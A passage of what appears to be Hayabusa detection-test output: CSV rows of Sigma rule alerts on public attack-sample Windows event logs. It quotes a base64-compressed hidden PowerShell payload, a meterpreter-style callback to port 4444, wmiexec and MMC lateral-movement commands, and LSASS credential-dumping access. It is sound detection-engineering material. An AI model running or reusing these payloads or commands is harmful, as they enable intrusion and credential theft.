IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.371 +09:00,IEWIN7,10,low,,Process Access,Src Process: 50\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3872 | Src PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900 | Tgt PID: 2484 | Tgt PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:53.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:33801 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:54.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49160 (IEWIN7) | Dst: 10.0.2.19:4444 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:32:50.902 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45616 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.168 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 3840 | PGUID: 365ABB72-B0F3-5CC8-0000-00105F321D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.168 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.246 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2504 | PGUID: 365ABB72-B0F3-5CC8-0000-0010B1361D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.246 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2828 | PGUID: 365ABB72-B0F3-5CC8-0000-0010C43A1D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | LID: 0x1d313d | PID: 3328 | PGUID: 365ABB72-B0F3-5CC8-0000-0010373E1D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49162 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49162 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:35:11.856 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\mmc.exe -Embedding | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1ea3c6 | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,Exec,MMC20 Lateral Movement,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:12.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1504 | PGUID: 365ABB72-B180-5CC8-0000-00102BB71E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:12.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45622 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49163 (IEWIN7) | Dst: 10.0.2.19:33474 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49164 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49164 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 3372 | PGUID: 365ABB72-B181-5CC8-0000-0010ADBF1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1256 | PGUID: 365ABB72-B181-5CC8-0000-001023C41E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | LID: 0x1ea3c6 | PID: 692 | PGUID: 365ABB72-B181-5CC8-0000-00108DC71E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 07:48:58.901 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Local\Temp\302a23.msi | Process: C:\Windows\System32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:48:58.901 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-00109B5A3C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:48:59.260 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\vssvc.exe | Process: C:\Windows\System32\VSSVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-D0DB-5CC8-0000-0010488A3C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:08.760 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Windows\Installer\304d1c.msi | Process: C:\Windows\system32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:49:07.854 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-0010216F3C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00 | Hash: SHA1=06B1640F88EDC6A7CE3303CB14A505A86B061616,MD5=E40CF1CC132F25719F86F0FC5870910D,SHA256=A89385CCD4BE489CD069C65DA10A0B952CB3DE9090EF4C9F02E1368392CD66C5,IMPHASH=481F47BBB2C9C21E108D65F52B04C448",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:09.760 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:10.198 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | LID: 0xffe4 | PID: 2892 | PGUID: 365ABB72-D0E5-5CC8-0000-0010DADF3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,PrivEsc,Always Install Elevated MSI Spawned Cmd And Powershell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd | LID: 0xffe4 | PID: 1372 | PGUID: 365ABB72-D1AB-5CC8-0000-0010DB1E4400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-02 23:48:53.950 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49178 (IEWIN7.home) | Dst: 151.101.36.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1508 | PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 1508 | Src PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00 | Tgt PID: 484 | Tgt PGUID: 365ABB72-8077-5CCB-0000-0010F2590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
